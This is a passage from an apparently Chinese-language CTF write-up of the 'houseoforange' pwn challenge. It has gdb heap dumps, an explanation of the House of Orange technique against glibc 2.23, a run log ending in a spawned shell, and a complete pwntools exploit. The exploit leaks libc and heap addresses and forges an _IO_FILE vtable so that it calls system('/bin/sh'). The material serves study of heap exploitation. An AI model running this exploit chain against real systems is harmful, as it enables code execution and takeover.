gdb-peda$ x/32gx 0x555555758010-0x100x555555758000: 0x0000000000000000 0x00000000000000210x555555758010: 0x0000555555758050 0x00005555557580300x555555758020: 0x0000000000000000 0x00000000000000210x555555758030: 0x4141414141414141 0x41414141414141410x555555758040: 0x4141414141414141 0x41414141414141410x555555758050: 0x0000001f00000001 0x41414141414141410x555555758060: 0x0000000000000000 0x00000000000000210x555555758070: 0x0000555555758090 0x00005555557790100x555555758080: 0x0000000000000000 0x00000000000000210x555555758090: 0x0000001f00000001 0x00000000000000000x5555557580a0: 0x0000000000000000 0x0000000000000021 <-- house 30x5555557580b0: 0x00005555557584e0 0x00005555557580d00x5555557580c0: 0x0000000000000000 0x0000000000000411 <-- name 30x5555557580d0: 0x4141414141414141 0x0a414141414141410x5555557580e0: 0x00005555557580c0 0x00005555557580c00x5555557580f0: 0x0000000000000000 0x0000000000000000
house of orange
def house_of_orange():io_list_all = libc_base + libc.symbols['_IO_list_all']system_addr = libc_base + libc.symbols['system']vtable_addr = heap_addr + 0x5c8log.info("_IO_list_all address: 0x%x" % io_list_all)log.info("system address: 0x%x" % system_addr)log.info("vtable address: 0x%x" % vtable_addr)stream = "/bin/sh\x00" + p64(0x60) # fake header # fpstream += p64(0) + p64(io_list_all - 0x10) # fake bk pointerstream = stream.ljust(0xa0, '\x00')stream += p64(heap_addr + 0x5b8) # fp->_wide_datastream = stream.ljust(0xc0, '\x00')stream += p64(1) # fp->_modepayload = "A" * 0x420payload += streampayload += p64(0) * 2payload += p64(vtable_addr) # _IO_FILE_plus->vtablepayload += p64(1) # fp->_wide_data->_IO_write_basepayload += p64(2) # fp->_wide_data->_IO_write_ptrpayload += p64(system_addr) # vtable __overflowupgrade(0x600, payload)
现在我们有了 libc 和 heap 地址,接下来就是真正的 house-of-orange,相信你已经看了参考章节,这里就不再重复了。结果如下:
gdb-peda$ x/36gx 0x5555557580c0+0x4100x5555557584d0: 0x4141414141414141 0x41414141414141410x5555557584e0: 0x0000001f00000001 0x41414141414141410x5555557584f0: 0x0068732f6e69622f 0x0000000000000060 <-- _IO_FILE_plus0x555555758500: 0x0000000000000000 0x00007ffff7dd25100x555555758510: 0x0000000000000000 0x00000000000000000x555555758520: 0x0000000000000000 0x00000000000000000x555555758530: 0x0000000000000000 0x00000000000000000x555555758540: 0x0000000000000000 0x00000000000000000x555555758550: 0x0000000000000000 0x00000000000000000x555555758560: 0x0000000000000000 0x00000000000000000x555555758570: 0x0000000000000000 0x00000000000000000x555555758580: 0x0000000000000000 0x00000000000000000x555555758590: 0x00005555557585b8 0x00000000000000000x5555557585a0: 0x0000000000000000 0x00000000000000000x5555557585b0: 0x0000000000000001 0x00000000000000000x5555557585c0: 0x0000000000000000 0x00005555557585c8 <-- vtable0x5555557585d0: 0x0000000000000001 0x00000000000000020x5555557585e0: 0x00007ffff7a53380 0x000000000000000a
可以看到 old top chunk 的 size 被改写为 0x60,在下次分配时,会先从 unsorted bin 中取下 old top chunk,将其放到 smallbins[5],同时,unsorted bin 的 bk 也将被改写成了 &IO_list_all-0x10。
pwn
def pwn():io.sendlineafter("Your choice : ", '1') # abort routineio.interactive()
由于不能够通过检查,将触发异常处理过程,malloc_printerr -> __libc_message -> __GI_abort -> _IO_flush_all_lockp。
开启 ASLR,Bingo!!!
$ python exp.py[+] Starting local process './houseoforange': pid 6219[*] libc_base address: 0x7f02ae6d9000[*] heap address: 0x5575b74a2000[*] _IO_list_all address: 0x7f02aea9d520[*] system address: 0x7f02ae71e380[*] vtable address: 0x5575b74a25c8[*] Switching to interactive mode*** Error in `./houseoforange': malloc(): memory corruption: 0x00007f02aea9d520 ***======= Backtrace: =========...$ whoamifirmy
exploit
完整的 exp 如下:
#!/usr/bin/env pythonfrom pwn import *#context.log_level = 'debug'io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc-2.23.so'})libc = ELF('libc-2.23.so')def build(size, name):io.sendlineafter("Your choice : ", '1')io.sendlineafter("Length of name :", str(size))io.sendlineafter("Name :", name)io.sendlineafter("Price of Orange:", '1')io.sendlineafter("Color of Orange:", '1')def see():io.sendlineafter("Your choice : ", '2')data = io.recvuntil('\nPrice', drop=True)[-6:].ljust(8, '\x00')return datadef upgrade(size, name):io.sendlineafter("Your choice : ", '3')io.sendlineafter("Length of name :", str(size))io.sendlineafter("Name:", name)io.sendlineafter("Price of Orange:", '1')io.sendlineafter("Color of Orange:", '1')def overwrite_top():build(0x10, 'AAAA')payload = "A" * 0x30payload += p64(0) + p64(0xfa1) # top chunk headerupgrade(0x41, payload)def leak_libc():global libc_basebuild(0x1000, 'AAAA') # _int_free in sysmallocbuild(0x400, 'A' * 7) # large chunklibc_base = u64(see()) - 0x3c4188 # fd pointerlog.info("libc_base address: 0x%x" % libc_base)def leak_heap():global heap_addrupgrade(0x10, 'A' * 15)heap_addr = u64(see()) - 0xc0 # fd_nextsize pointerlog.info("heap address: 0x%x" % heap_addr)def house_of_orange():io_list_all = libc_base + libc.symbols['_IO_list_all']system_addr = libc_base + libc.symbols['system']vtable_addr = heap_addr + 0x5c8log.info("_IO_list_all address: 0x%x" % io_list_all)log.info("system address: 0x%x" % system_addr)log.info("vtable address: 0x%x" % vtable_addr)stream = "/bin/sh\x00" + p64(0x61) # fake header # fpstream += p64(0) + p64(io_list_all - 0x10) # fake bk pointerstream = stream.ljust(0xa0, '\x00')stream += p64(heap_addr + 0x5b8) # fp->_wide_datastream = stream.ljust(0xc0, '\x00')stream += p64(1) # fp->_modepayload = "A" * 0x420payload += streampayload += p64(0) * 2payload += p64(vtable_addr) # _IO_FILE_plus->vtablepayload += p64(1) # fp->_wide_data->_IO_write_basepayload += p64(2) # fp->_wide_data->_IO_write_ptrpayload += p64(system_addr) # vtable __overflowupgrade(0x600, payload)def pwn():io.sendlineafter("Your choice : ", '1') # abort routineio.interactive()if __name__ == '__main__':overwrite_top()leak_libc()leak_heap()house_of_orange()pwn()
